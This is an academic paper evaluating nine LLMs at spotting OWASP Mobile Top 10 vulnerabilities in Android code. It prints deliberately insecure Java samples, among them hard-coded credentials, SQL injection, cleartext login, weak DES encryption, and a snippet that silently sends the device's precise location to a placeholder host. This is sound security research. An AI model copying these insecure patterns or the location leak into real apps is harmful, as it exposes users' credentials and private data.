Department of Information and Communication Systems Engineering, University of the Aegean, Karlovasi, 83200, Samos, Greece
Assessing the Effectiveness of LLMs in Android Application Vulnerability Analysis
Abstract
The increasing frequency of attacks on Android applications, coupled with the recent popularity of large language models (LLMs), necessitates a comprehensive understanding of the capabilities of the latter in identifying potential vulnerabilities, which is key to mitigating the overall risk. To this end, the work at hand compares the ability of nine state-of-the-art LLMs to detect Android code vulnerabilities listed in the latest Open Worldwide Application Security Project (OWASP) Mobile Top 10. Each LLM was evaluated against an open dataset of over 100 vulnerable code samples, including obfuscated ones, assessing each model’s ability to identify key vulnerabilities. Our analysis reveals the strengths and weaknesses of each LLM, identifying important factors that contribute to their performance. Additionally, we offer insights into context augmentation with retrieval-augmented generation (RAG) for detecting Android code vulnerabilities, which in turn may propel secure application development. Finally, while the reported findings regarding code vulnerability analysis show promise, they also reveal significant discrepancies among the different LLMs.
Keywords:
Large Language Models, Vulnerability analysis, Code analysis, OWASP, Mobile security, Android, Retrieval-Augmented Generation.

1 Introduction
As mobile devices continue to proliferate, the need for secure software development practices remains a high priority. The predominant Android platform has become a prime target for attackers and malware writers seeking to exploit vulnerabilities in the vast cosmos of mobile applications [1]. The importance and volume of mobile vulnerabilities have led the Open Worldwide Application Security Project (OWASP) to periodically publish a current, reputable list of the most prevalent vulnerabilities detected in mobile applications, namely the OWASP Mobile Top 10 [2]. This list can serve as a key benchmark in assessing the performance of any tool in finding software vulnerabilities [3].
An emerging approach to detecting Android code vulnerabilities is the use of large language models (LLMs) for code analysis. In fact, the use of language models for code analysis can be traced back to the early 2010s. In 2013, the introduction of Word2Vec [4], a shallow neural network, marked the beginning of deep learning-based language models. That algorithm was capable of learning word embeddings, i.e., encodings of word meaning, from large datasets. In 2018, Google introduced Word2Vec’s successor, a language model known as Bidirectional Encoder Representations from Transformers (BERT) [5]. BERT is trained bidirectionally, meaning that it learns information from both the left and right context of a given text during training, thereby obtaining a better understanding of the context.
In the realm of code analysis, LLMs began to gain traction around 2017. One of their early applications was code completion. Models like GPT-2 [6], fully released in Nov. 2019, were trained on a large corpus of source code. By understanding the structure and context of the code, these models could predict the most likely code to follow a given input. In 2020, OpenAI [7] introduced GPT-3 [8], a significantly larger model with 175B parameters. This model showed improved capabilities in generating human-like text and was even able to generate code when given a task description. The ability of LLMs to analyze and understand code has also been demonstrated in recent studies [9, 10]. Nevertheless, to the best of our knowledge, the literature so far lacks a comprehensive comparison of the ability of these models to detect Android code vulnerabilities.
The present work aims to fill this gap by comparing the ability of nine state-of-the-art LLMs to detect Android code vulnerabilities listed in the OWASP Mobile Top 10. Specifically, each model is evaluated regarding its performance in identifying key vulnerabilities against a dataset comprising snippets of vulnerable Android code. The assessment of each model is done through a combination of manual and automated evaluation methods. We additionally pinpoint the strengths and weaknesses of each LLM and provide insights into the factors that contribute to their performance. Overall, this study provides valuable insights into the use of LLMs for detecting mobile code vulnerabilities, thus contributing to the development of effective methods for secure mobile coding. The contributions of the paper are summarized as follows.
• We present a thorough comparative analysis of the capabilities and performance of nine leading LLMs, i.e., GPT 3.5, GPT 4, GPT 4 Turbo, Llama 2, Zephyr Alpha, Zephyr Beta, Nous Hermes Mixtral, MistralOrca, and Code Llama, in identifying vulnerabilities residing in Android applications. The experiments conducted provide concrete evidence of the LLMs’ capabilities for such tasks, also identifying the limitations per LLM. These insights are critical for anyone interested in understanding the trade-offs associated with each LLM.
• We examine the impact of context augmentation on LLMs and contribute a set of guidelines regarding the selection and fine-tuning of LLMs towards enhancing the security posture of Android code.
• We offer an open dataset to the community for driving research in this field forward.
The remainder of this paper is structured as follows. The next section presents previous work on the use of LLMs for code vulnerability analysis. Section 3 details our methodology, while the results per LLM are given in Section 4. The last section concludes and proposes some lines for future research.
2 Previous work
In recent years, LLMs have gained significant attention in the field of cybersecurity for their potential to provide assistance in various domains, including vulnerability detection, penetration testing, and security analysis. State-of-the-art surveys such as [13, 14] and [15], as well as a more recent but not yet peer-reviewed study [16], provide comprehensive overviews of the current state and potential future applications of LLMs in cybersecurity. These works analyze the challenges, practical implications, and future research directions to exploit the full potential of these models in ensuring cyber resilience. The rest of this section will focus on literature dealing with software vulnerability analysis using LLMs. This includes works that have already been peer-reviewed, as well as more recent research that has been self-archived for the sake of completeness.
In [17], transformer-based LLMs are evaluated in the task of code vulnerability detection. The authors evaluate such LLMs, including BERT, DistilBERT, CodeBERT, GPT-2 and Megatron, against C/C++ source code snippets from two publicly available datasets. The results showed that LLMs perform well in software vulnerability tasks; indicatively, the best scoring model, GPT-2, had an F1-score above 95% in all tests. In the context of software engineering, [18] investigates the use of in-context learning to improve the ability of LLMs to detect software vulnerabilities, showcasing the adaptability of LLMs to learn from context-specific examples. The authors use code retrieval to search for code snippets that are similar to the examined code and feed them to the LLM together with the examined code and its analysis. Their experimental results show that this approach has better performance than the original GPT model.
Another set of works adds verification to the vulnerability detection process. An empirical study of using LLMs for vulnerability assessment in software was conducted in [19]. The authors used four well-known pre-trained LLMs to identify vulnerabilities in two labeled datasets, namely code gadgets and CVEfixes, with static analysis as a reference point. The LLMs used include GPT-3.5, Davinci, and CodeGen, and the analysis was limited to two kinds of vulnerabilities: SQL injections and buffer overflows. The study concluded that LLMs do not perform well at detecting vulnerabilities, presenting high false-positive rates, but could complement and improve the traditional static analysis process. Concerns about the safe use of code assistants are addressed in [20]. In this case, LLMs are used to produce code, which is then assessed manually and with static analysis. This study provides empirical insights into how developers interact with LLMs, underscoring the importance of user awareness to mitigate security risks associated with assisted code generation.
Moving to non-peer-reviewed works, [21] delves into the application of LLMs in static binary taint analysis, demonstrating how these models can assist in the vulnerability inspection of binaries. A binary is first disassembled and decompiled, and an LLM is used to identify security-sensitive functions that may contain vulnerabilities, as well as candidate dangerous flows. In the last phase, the LLM combines the previous results to produce a vulnerability report for the examined binary. The authors of [22] propose DefectHunter, a vulnerability detection mechanism that combines various technologies, including LLMs. Its architecture has three main building blocks: a tool for extracting structural information from code snippets, a pre-trained LLM for generating semantic information, and a Conformer mechanism to identify vulnerabilities from the previously extracted structural and semantic data.
The authors of [23] evaluated ChatGPT and GPT-3 in the detection of Common Weakness Enumeration (CWE) vulnerabilities contained in code. Using a custom real-world dataset with Java files from open GitHub repositories, they concluded that the detection capabilities of the aforementioned models are limited. In [24], an empirical study of the potential of LLMs for detecting software vulnerabilities is presented. The authors tested 129 code samples from various GitHub repositories, written in eight different languages, and their results showed that GPT-4 identified around four times more vulnerabilities than traditional, rule-based static code analysis tools. In addition, the LLMs, which include GPT-3 and GPT-4, were also asked to provide fixes for the identified vulnerabilities.
Apart from generic code, LLMs have been used for detecting vulnerabilities in smart contracts. LLM4Vuln [25] is an evaluation framework for LLM-based vulnerability detection systems, focusing on smart contract vulnerabilities. The difference from other similar works is that, instead of benchmarking the performance of LLMs in vulnerability detection, the authors evaluate the vulnerability reasoning capabilities of each model. Similarly, the authors of [26] proposed GPTLens, a framework for detecting vulnerabilities in smart contracts using LLMs. GPTLens takes a different approach from traditional one-stage detection in order to decrease false positives. The detection process is broken down into two steps, where the LLM takes on two different roles: auditor and critic. As an auditor, the LLM provides a wide range of candidate vulnerabilities for the examined contract, whereas as a critic it verifies the claims produced in the first step. The performed experiments show that GPTLens presents improved results over single-stage vulnerability detection.
3 Methodology
This section details our methodology, including the creation of the benchmark dataset, the selection of LLMs, and the evaluation process.
3.1 Dataset
As also discussed in Section 2, to our knowledge, there is no publicly available dataset containing vulnerable Android code that covers each of the OWASP Mobile Top 10 vulnerabilities. The most relevant dataset to our study is LVDAndro [27], which, however, is labelled based on CWE. Additionally, since LVDAndro was created using actual Android applications, it contains a significant proportion of non-vulnerable code. In view of this gap, for the needs of our experiments, we created a new dataset coined Vulcorpus [28], containing 100 pieces of vulnerable code. It is important to note that the term “piece of code”, hereafter called sample, refers to a part of an application, not its full codebase. All the samples were written in Java by exploiting common insecure coding practices, e.g., logging private information, not filtering input/objects, etc., and target the Android OS. Obviously, however, the same vulnerabilities also apply to other mobile platforms, say, iOS.
More specifically, Vulcorpus contains 10 samples for each of the OWASP Mobile Top 10 vulnerabilities of 2024, which are briefly explained in subsection 3.2. Every sample exhibits one or at most two interrelated vulnerabilities, while one or two of the samples per vulnerability category are obfuscated using the well-known renaming technique. Half of the samples per vulnerability contain code comments regarding the specific vulnerability. Moreover, to assess each LLM in detecting privacy-invasive code, we created three more samples which perform risky actions without asking the user for confirmation. These actions are:
• Get the precise location of the device through the “android.permission.ACCESS_FINE_LOCATION” permission, and directly share the latitude and longitude over the Internet via an API. According to the Android API documentation [29], this permission has a “dangerous” protection level, namely it may give the requesting application access to the user’s private data, among others.
• Capture an image via the “ACTION_IMAGE_CAPTURE” intent [30], and subsequently attempt to share the captured image file via an API.
• Open local documents through the “ACTION_OPEN_DOCUMENT” intent [31], and attempt to send them to a remote host via an API.
The latter three samples are also available at [28] along with Vulcorpus.
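For illustration, the snippet below is a minimal sketch in the spirit of the first of these three samples: the precise device location is obtained and silently transmitted to a remote endpoint. Class, method, and endpoint names are ours and purely illustrative; they are not taken verbatim from Vulcorpus.

```java
// Hypothetical sketch of the location-sharing sample: the last known precise location is
// read and silently posted to a remote endpoint. Class, method, and URL names are ours.
public class LocationLeakActivity extends android.app.Activity {

    @Override
    protected void onCreate(android.os.Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        android.location.LocationManager lm =
                (android.location.LocationManager) getSystemService(LOCATION_SERVICE);
        try {
            // Requires android.permission.ACCESS_FINE_LOCATION ("dangerous" protection level).
            android.location.Location loc =
                    lm.getLastKnownLocation(android.location.LocationManager.GPS_PROVIDER);
            if (loc != null) {
                shareOverApi(loc.getLatitude(), loc.getLongitude());
            }
        } catch (SecurityException e) {
            // Permission not granted at runtime.
        }
    }

    private void shareOverApi(double lat, double lon) {
        new Thread(() -> {
            try {
                java.net.URL url = new java.net.URL(
                        "https://api.example.com/collect?lat=" + lat + "&lon=" + lon);
                java.net.HttpURLConnection con =
                        (java.net.HttpURLConnection) url.openConnection();
                con.getInputStream().close(); // location leaves the device without user consent
            } catch (java.io.IOException ignored) {
                // Failures are silently ignored in this sketch.
            }
        }).start();
    }
}
```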
3.2 List of vulnerabilities
This subsection briefly delineates each vulnerability contained in the current OWASP Mobile Top 10 list. For more details regarding each vulnerability, the reader is referred to [2]. It is important to note that the list differs from its 2016 version, given that four vulnerabilities contained in the 2016 list have been replaced with new ones in the current list. The reader should also keep in mind that while some categories of vulnerabilities, say, M5, are straightforward, others, such as M7, might be more complicated for LLMs to understand.
Improper credential usage (M1): Poor credential management can lead to severe security issues, namely, unauthorized users may be able to gain access to sensitive information or administrative functionalities within the mobile app or its backend systems. This in turn leads to data breaches and fraudulent activities.
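As a rough illustration of this category, the sketch below shows hard-coded credentials of the kind such samples exploit; class, field, and value names are hypothetical and not taken from Vulcorpus.

```java
// Hypothetical M1-style sample: API credentials hard-coded in the source, hence present in
// the shipped APK. All identifiers and values are illustrative.
public class BackendClient {
    private static final String API_USER = "admin";        // hard-coded username
    private static final String API_PASSWORD = "s3cr3t!";  // hard-coded password

    public String buildAuthHeader() {
        String raw = API_USER + ":" + API_PASSWORD;
        // Base64 is encoding, not encryption: anyone decompiling the app recovers the secret.
        return "Basic " + android.util.Base64.encodeToString(
                raw.getBytes(java.nio.charset.StandardCharsets.UTF_8),
                android.util.Base64.NO_WRAP);
    }
}
```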
Inadequate supply chain security (M2): By exploiting vulnerabilities in the mobile supply chain, attackers may be able to manipulate application functionality. For example, they can insert malicious code into the mobile application’s codebase or libraries [32], as well as modify the code during the application’s build process to introduce backdoors, spyware, or other types of malware. An attacker can also exploit vulnerabilities in third-party software libraries, software development kits (SDKs), or hard-coded credentials to gain access to the mobile app or the backend servers. Overall, this type of vulnerability can lead to unauthorized data access or manipulation, denial of service, or complete takeover of the mobile application or device.
Insecure authentication/authorization (M3): Poor authorization could lead to the destruction of systems or unauthorized access to sensitive information, while poor authentication results in the inability to identify the user making an action request, leading to the inability to log or audit user activity. This situation makes it difficult to detect the source of an attack, understand any underlying exploits, or develop strategies to prevent future attacks. Obviously, authentication failures are tightly coupled to authorization failures; when authentication controls fail, authorization cannot be performed. That is, if an attacker can anonymously execute sensitive functionality, it indicates that the underlying code is not verifying the user’s permissions, highlighting failures in both authentication and authorization controls.
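The following sketch illustrates a typical authorization failure of this kind: an exported component performs a sensitive action for any caller without verifying identity or permissions. All names are hypothetical and not taken from Vulcorpus.

```java
// Hypothetical M3-style sample: an exported receiver resets the stored password for any
// caller, without authenticating the user or checking the sender. Names are illustrative.
public class ResetPasswordReceiver extends android.content.BroadcastReceiver {
    @Override
    public void onReceive(android.content.Context context, android.content.Intent intent) {
        String newPassword = intent.getStringExtra("new_password");
        // No caller verification and no user confirmation: if exported in the manifest,
        // any app on the device can trigger this action.
        context.getSharedPreferences("auth", android.content.Context.MODE_PRIVATE)
               .edit().putString("password", newPassword).apply();
    }
}
```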
Insufficient input/output validation (M4): A mobile application that does not adequately validate and sanitize data from external sources, like user inputs or network data, is susceptible to a range of attacks, including SQL injection, command injection, and cross-site scripting. Insufficient output validation can also lead to data corruption or presentation vulnerabilities, possibly allowing a malicious actor to inject harmful code or manipulate sensitive information shown to users.
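A classic instance of this category is unvalidated input concatenated into a SQL query, as in the illustrative sketch below; identifiers are hypothetical, not taken from Vulcorpus.

```java
// Hypothetical M4-style sample: unvalidated user input concatenated into a raw SQL query,
// enabling SQL injection against the app's local database. Names are illustrative.
public class UserDao {
    private final android.database.sqlite.SQLiteDatabase db;

    public UserDao(android.database.sqlite.SQLiteDatabase db) {
        this.db = db;
    }

    public android.database.Cursor findUser(String nameFromInputField) {
        // An input such as "x' OR '1'='1" returns every row; a parameterized
        // query (rawQuery with selectionArgs) should be used instead.
        String query = "SELECT * FROM users WHERE name = '" + nameFromInputField + "'";
        return db.rawQuery(query, null);
    }
}
```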
Insecure communication (M5): Modern mobile applications typically communicate with one or more remote servers. This renders user data susceptible to interception and modification if it is transmitted in plaintext or with an outdated encryption protocol.
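For illustration, the hypothetical sketch below submits credentials over cleartext HTTP; the endpoint and class names are ours, not from Vulcorpus.

```java
// Hypothetical M5-style sample: credentials submitted over cleartext HTTP, exposing them to
// interception and modification in transit. The endpoint is illustrative.
public class LoginTask {
    public void login(String user, String password) throws java.io.IOException {
        java.net.URL url = new java.net.URL("http://example.com/login"); // no TLS
        java.net.HttpURLConnection con = (java.net.HttpURLConnection) url.openConnection();
        con.setDoOutput(true);
        String body = "user=" + user + "&pass=" + password;              // plaintext body
        con.getOutputStream().write(body.getBytes(java.nio.charset.StandardCharsets.UTF_8));
        con.getInputStream().close();
    }
}
```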
Inadequate privacy controls (M6): Privacy controls aim to safeguard Personally Identifiable Information (PII), including names and addresses, credit card details, emails, and information related to health, religion, sexuality, and political opinions. This sensitive information can be used to impersonate the victim for fraudulent activities, misuse their payment data, blackmail them with sensitive information, or harm them by destroying or manipulating sensitive data.
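A simple illustrative example of such a failure is PII written to the system log, as sketched below; names and values are hypothetical.

```java
// Hypothetical M6-style sample: personally identifiable information written to the system
// log, where it may end up in bug reports or be read by other tooling. Names are illustrative.
public class CheckoutLogger {
    public void logOrder(String fullName, String cardNumber, String address) {
        android.util.Log.d("Checkout", "Order by " + fullName
                + ", card=" + cardNumber + ", address=" + address); // PII leaks to logcat
    }
}
```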
Insufficient binary protections (M7): The application’s binary may hold valuable information, such as commercial API keys or hard-coded cryptographic secrets. Furthermore, the code within the binary itself could be valuable, for instance, containing critical business logic or pre-trained AI models. In addition to gathering information, attackers may also manipulate app binaries to gain access to paid features for free or to bypass other security controls. In the worst-case scenario, popular apps could be altered to include malicious code and then distributed through third-party app stores or under a new name to deceive unsuspecting users.
Security misconfiguration (M8): These occur when security settings, permissions, or controls are improperly configured, leading to vulnerabilities and unauthorized access.
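As an illustrative sketch of this category, the hypothetical snippet below configures a WebView with unnecessarily permissive settings; names and the URL are ours, not from Vulcorpus.

```java
// Hypothetical M8-style sample: a WebView configured with unnecessarily permissive settings
// and pointed at a cleartext page. Names and the URL are illustrative.
public class HelpActivity extends android.app.Activity {
    @Override
    protected void onCreate(android.os.Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        android.webkit.WebView webView = new android.webkit.WebView(this);
        android.webkit.WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);                 // risky when combined with the flags below
        settings.setAllowFileAccess(true);                   // local files reachable from web content
        settings.setAllowUniversalAccessFromFileURLs(true);  // file:// pages may read any origin
        setContentView(webView);
        webView.loadUrl("http://example.com/help");          // cleartext page controls this WebView
    }
}
```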
Insecure data storage (M9): Such vulnerabilities may stem from weak encryption, insufficient data protection, insecure data storage mechanisms, and improper handling of user credentials.
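For illustration, the hypothetical sketch below stores credentials in plaintext SharedPreferences rather than an encrypted store; all names are ours.

```java
// Hypothetical M9-style sample: a password and session token persisted in plaintext
// SharedPreferences rather than an encrypted store. Names are illustrative.
public class SessionStore {
    public void save(android.content.Context ctx, String user, String password, String token) {
        android.content.SharedPreferences prefs =
                ctx.getSharedPreferences("session", android.content.Context.MODE_PRIVATE);
        prefs.edit()
             .putString("user", user)
             .putString("password", password) // plaintext credential at rest
             .putString("token", token)
             .apply();
    }
}
```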
Insufficient cryptography (M10): The use of obsolete cryptographic suites, primitives, or practices may lead to loss of data confidentiality and integrity, as well as the inability to enforce source authentication, among others. Typical repercussions include data decryption, manipulation of cryptographic processes, leakage of encryption keys, etc.
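An illustrative sketch of this category is the use of an obsolete cipher with a hard-coded key, as in the hypothetical snippet below; the key and names are ours, not from Vulcorpus.

```java
// Hypothetical M10-style sample: an obsolete cipher (DES in ECB mode) with a hard-coded,
// low-entropy key, providing effectively no confidentiality. Key and names are illustrative.
public class WeakCrypto {
    private static final byte[] KEY =
            "12345678".getBytes(java.nio.charset.StandardCharsets.UTF_8); // 8-byte DES key

    public byte[] encrypt(byte[] plaintext) throws java.security.GeneralSecurityException {
        javax.crypto.Cipher cipher = javax.crypto.Cipher.getInstance("DES/ECB/PKCS5Padding");
        javax.crypto.spec.SecretKeySpec key = new javax.crypto.spec.SecretKeySpec(KEY, "DES");
        cipher.init(javax.crypto.Cipher.ENCRYPT_MODE, key);
        return cipher.doFinal(plaintext); // AES-GCM with a Keystore-backed key should be used instead
    }
}
```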
3.3 Selection of LLMs
For the purposes of our experiments, nine contemporary, well-known LLMs were chosen: three commercial models, i.e., GPT 3.5, GPT 4, and GPT 4 Turbo, and six open-source models, i.e., Llama 2, Zephyr Alpha, Zephyr Beta, Nous Hermes Mixtral, MistralOrca, and Code Llama. According to their documentation, these models have been pre-trained on large amounts of text data, including code, and have demonstrated good performance in various software engineering tasks, including code analysis. That is, their ability to understand code syntax and semantics makes them well-suited for identifying vulnerabilities residing in code. Additionally, their large size and diverse training data make them less likely to overfit to a specific codebase. A succinct description of each LLM is given below.
• GPT 3.5 (gpt-35-turbo, version Nov. 2023) [33]: A powerful language model that has been pre-trained on a large corpus of text data, including code. It has demonstrated good performance in various natural language processing (NLP) tasks and has been used for code analysis tasks such as code completion, code search, and code summarization.
• GPT 4 [34, 35]: The successor of GPT 3.5, described by OpenAI as its most advanced system, producing safer and more useful responses; like its predecessor, it has been pre-trained on large amounts of text and code.
• GPT 4 Turbo (gpt-4-1106): A variant of GPT 4, specifically designed for tasks that require faster inference times, such as code analysis. It has been pre-trained on the same large corpus of text data as GPT 4, but optimized for faster performance.
• Llama 2 (Llama-2-70b-chat) [36]: This LLM has been pre-trained on a diverse set of text data, including code. It has demonstrated good performance in various NLP tasks and has also been exploited for code analysis tasks, including code summarization and code search.
• Zephyr Alpha (zephyr-7b-alpha) [37]: It is pre-trained on a huge corpus of text data from diverse sources, including books, articles, and websites, and has been fine-tuned on top of the Mistral LLM with a mix of publicly available and synthetic datasets. Despite its small size (7B parameters), it reportedly shows a performance comparable to several models with 20-30B parameters.
• Zephyr Beta (zephyr-7b-beta) [37]: This model has also been fine-tuned on top of the Mistral LLM with a mix of publicly available and synthetic datasets. It is the successor of Zephyr Alpha and is therefore considered significantly more powerful than its predecessor. Based on its documentation, it is fast and competent, showing a performance comparable to the best open-source models of around 70B parameters.
• Nous Hermes Mixtral (nous-hermes-2-mixtral-8x7b-dpo) [38]: It is one of the most powerful open-source models available, comprising a fine-tuned version of the Mixtral base model.
• MistralOrca [39]: A 7B model built on top of Mistral and instruction-tuned on a filtered OpenOrca dataset of GPT-4 explanation traces [40, 41].
• Code Llama [42]: A special version of Llama 2, tailored specifically for coding applications. This specialized version has been refined through extensive additional training on code-focused data, with prolonged exposure to relevant datasets, resulting in a tool with allegedly superior coding proficiency that builds upon the foundation of Llama 2. More specifically, Code Llama can generate code and create explanations about code in response to prompts in both programming and natural language. Its capabilities extend to assisting with code completion and troubleshooting code errors. Furthermore, Code Llama is versatile, supporting a broad array of widely-used programming languages, including Python, C++, Java, PHP, JavaScript, C#, and Bash. In this work, we examine the smallest pre-trained model, namely the 7B version. In addition, for this LLM, in a separate run, we employed LlamaIndex [43] to improve the detection capabilities of Code Llama. LlamaIndex is a data framework for LLM-based applications, enhancing them with additional contextual data. This context augmentation technique is called Retrieval-Augmented Generation (RAG) and can be used to address the limitations of LLMs by giving them access to contextual, current data. For the RAG process, we used 50% of Vulcorpus, i.e., only the samples that contain code comments regarding the specific vulnerability. Android’s application quality and security guidelines and code examples [44] were also added as input to the RAG, along with information on each vulnerability from the OWASP website [2].
3.4 Evaluation process
All nine pre-trained LLMs listed in subsection 3.3, except Code Llama, were run on the GPT@JRC platform, a system developed by the European Commission’s Joint Research Centre (JRC). Code Llama was run on a local computer with an M2 processor and 16GB of unified memory. Each LLM was fed with Vulcorpus to compare its performance in identifying potential vulnerabilities and proposing code improvements. To this end, as detailed in Section 4, we use a simple scoring system to present (a) the number of vulnerabilities each LLM was able to detect, and (b) whether the LLM proposed valid suggestions for possibly fixing the vulnerability. Both these partial scores have a maximum value of 10/10 per vulnerability category, i.e., one point for each piece of vulnerable code the LLM was able to detect and annotate. It is important to note that the input or question given to each LLM has a major effect on its output. For our study, each LLM was queried as follows: “Check if there are any security issues in the following code; if there are, explain the issue”.
As previously mentioned, the LLMs used in this work are pre-trained. This means that the associated libraries, possibly needed by each code sample but not included in the input, cannot be analyzed. This mostly affects the analysis regarding the M2 vulnerability. Therefore, to evaluate LLMs against M2, instead of Java code, we used 10 libraries with known vulnerabilities as input. These libraries, also included in Vulcorpus for reasons of reproducibility, were published before the training date of each LLM.
At the final stage, as detailed in Section 4, the results of each LLM were compared and cross-checked against those produced by two well-known SAST tools, namely Bearer [11] and MobSFscan [12]. Bearer is a static application security testing tool, which uses built-in rules covering the OWASP Top 10 and Common Weakness Enumeration (CWE) Top 25. MobSFscan is a static analysis tool that uses MobSF’s [45] security rules and can find insecure code patterns in Android or iOS source code. Finally, we also assessed the performance of each LLM in detecting privacy-invasive behaviors, using the three samples detailed in subsection 3.1. The output was rated using three categories: (a) not privacy-invasive, (b) potentially privacy-invasive, and (c) privacy-invasive.
4 Results
Tables 1 and 2 recapitulate the results for each LLM. Particularly, each row of Table 1 indicates whether the specific model Detected the vulnerability (denoted with the letter “D”), and whether it explained the situation and provided a valid solution for Improving the code (denoted with the letter “I”). Actually, the “I” aspect is a key factor in evaluating each LLM (also against each other), as this is the sole indicator of whether the LLM actually “perceives” the security issue.
Table 1: Detection (D) and improvement (I) scores per LLM and per OWASP Mobile Top 10 category (maximum 10 each).

LLM | M1 D | M1 I | M2 D | M2 I | M3 D | M3 I | M4 D | M4 I | M5 D | M5 I | M6 D | M6 I | M7 D | M7 I | M8 D | M8 I | M9 D | M9 I | M10 D | M10 I | Mean D | Mean I
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---
GPT-3.5 | 3 | 3 | 7 | N/A | 2 | 3 | 2 | 3 | 8 | 6 | 3 | 5 | 5 | 4 | 3 | 5 | 4 | 6 | 5 | 2 | 4.2 | 4.1 |
GPT-4 | 10 | 10 | 0 | N/A | 6 | 7 | 6 | 8 | 5 | 10 | 10 | 10 | 6 | 9 | 7 | 10 | 8 | 10 | 9 | 9 | 6.7 | 9.2 |
GPT-4 TURBO | 4 | 5 | 0 | N/A | 3 | 5 | 5 | 8 | 8 | 9 | 6 | 8 | 4 | 4 | 7 | 10 | 7 | 9 | 6 | 8 | 5 | 7.3 |
Nous Hermes Mixtral | 1 | 3 | 6 | N/A | 1 | 3 | 9 | 5 | 6 | 8 | 8 | 8 | 7 | 3 | 9 | 9 | 8 | 10 | 7 | 7 | 6.2 | 6.2 |
Mistral Orca | 9 | 9 | 0 | N/A | 2 | 2 | 4 | 4 | 5 | 5 | 0 | 0 | 3 | 4 | 0 | 1 | 10 | 10 | 4 | 3 | 3.7 | 4.2 |
Zephyr Alpha | 0 | 0 | 3 | N/A | 6 | 6 | 5 | 5 | 10 | 10 | 7 | 8 | 2 | 2 | 7 | 7 | 3 | 10 | 10 | 10 | 5.3 | 6.4 |
Zephyr Beta | 0 | 8 | 0 | N/A | 9 | 9 | 8 | 8 | 10 | 10 | 0 | 8 | 3 | 0 | 5 | 4 | 10 | 0 | 9 | 9 | 5.4 | 6.2 |
Llama 2 | 0 | 0 | 0 | N/A | 0 | 10 | 4 | 5 | 10 | 0 | 6 | 6 | 0 | 0 | 0 | 0 | 4 | 4 | 6 | 6 | 3 | 3.4 |
Code Llama* | 9 | 5 | 3 | N/A | 9 | 4 | 8 | 4 | 10 | 5 | 8 | 5 | 9 | 4 | 9 | 4 | 7 | 7 | 9 | 6 | 8.1 | 4.9 |
Table 2: Detection of privacy-invasive actions per LLM (Y: privacy-invasive, P: potentially privacy-invasive, N: not privacy-invasive).

LLM | Location | Camera | Files
---|---|---|---
GPT 3.5 | Y | P | P |
GPT 4 | N | P | N |
GPT 4 Turbo | P | Y | P |
Nous Hermes Mixtral | Y | P | P |
MistralOrca | N | N | N |
Zephyr Alpha | Y | P | Y |
Zephyr Beta | Y | P | N |
Llama 2 | P | Y | N |
Code Llama | N | N | Y |
Code Llama + RAG | N | Y | P |
Overall, with reference to Table 1, the best performers in terms of total vulnerabilities detected are Code Llama (81/100), GPT 4 (67/100), Nous Hermes Mixtral (62/100), Zephyr Beta (54/100), and Zephyr Alpha (53/100), followed by GPT 4 Turbo (50/100), GPT 3.5 (42/100), MistralOrca (37/100), and Llama 2 (30/100). On the other hand, the best performers in terms of total code improvement suggestions are GPT 4 (83/90), GPT 4 Turbo (66/90), Zephyr Alpha (58/90), Zephyr Beta (56/90), and Nous Hermes Mixtral (56/90), followed by Code Llama (44/90), MistralOrca (38/90), GPT 3.5 (37/90), and Llama 2 (31/90). Overall, GPT 4 emerges as the top performer, considering a composite score of high “D” and high “I”. On the other hand, LLMs like Code Llama, which do identify the correct vulnerability but fail to provide corrections or suggestions regarding the problematic lines of code, may indicate a model insufficiently trained for this type of analysis.
When looking at each vulnerability individually, GPT 4 achieved a perfect score for M1 and M6, MistralOrca for M9, Zephyr Alpha for M5 and M10, Zephyr Beta for M5 and M9, and Llama 2 and Code Llama for M5. Regarding the rest of the vulnerabilities, namely M2, M3, M4, M7, and M8, the best performers were GPT 3.5 (7/10), Zephyr Beta and Code Llama (9/10), Nous Hermes Mixtral (9/10), Code Llama (9/10), and Nous Hermes Mixtral and Code Llama (9/10), respectively. Concerning M2, recall from subsection 3.4 that it was tested using 10 vulnerable libraries published before the training date of each LLM. Even so, the low M2 detection performance in Table 1 for all the LLMs but GPT-3.5 may indicate that these libraries were not considered during LLM training, so the respective scores can be regarded only as indicative. The same applies to the “I” score for M2, which is marked as N/A. As discussed in subsection 3.3, to address these limitations, LLMs used for vulnerability detection can capitalize on context augmentation; this way, the LLM is provided with access to contextual, up-to-date data.
After averaging the “D” score over all nine LLMs, we sort the OWASP Top 10 vulnerabilities in ascending order in Table 3. This mean score provides an estimation of the detection difficulty per vulnerability as experienced by the different LLMs. The same table also includes the best performer(s) along with the respective score in parentheses. As observed from the table, from an LLM viewpoint, M2 is the toughest vulnerability, with an average score of 2.11. As explained in subsection 3.4, this poor outcome is conceivably due to a lack of sufficient, up-to-date information on the LLMs’ side. Generally, this low score is somewhat expected, as for this vulnerability the LLMs are checking for known security issues in a list of libraries instead of analyzing the application’s code. On the other hand, the highest average detection score was observed for M5, where four LLMs achieved a perfect score.
Table 3: OWASP Mobile Top 10 vulnerabilities sorted in ascending order of average detection score across the nine LLMs, along with the best performer(s) per category.

Vulnerability | Best performer | Avg. score
---|---|---
M2 | GPT 3.5 (7) | 2.1 |
M1 | GPT 4 (10) | 4 |
M7 | Code Llama* (9) | 4.33 |
M3 | Zephyr Beta (9), Code Llama* (9) | 4.33 |
M8 | Nous Hermes Mixtral (9), Code Llama* (9) | 5.22 |
M6 | GPT 4 (10) | 5.33 |
M4 | Nous Hermes Mixtral (9) | 5.66 |
M9 | MistralOrca (10), Zephyr Beta (10) | 6.77 |
M10 | Zephyr Alpha (10) | 7.22 |
M5 | Zephyr Alpha (10), Zephyr Beta (10), Llama 2 (10), Code Llama* (10) | 8 |
No less important, with reference to the last stage of the experiments as given in subsection 3.4, regarding the detection of privacy-invasive actions, six, eight, and six of the LLMs correctly perceived potential privacy-invasive actions for location, camera, and local file sharing, respectively. The best performer was Zephyr Alpha, which clearly marked two out of three samples as privacy-invasive and the remaining one as potentially privacy-invasive. The worst performer in this type of experiment was MistralOrca, which was unable to detect any possible privacy-invasive actions.
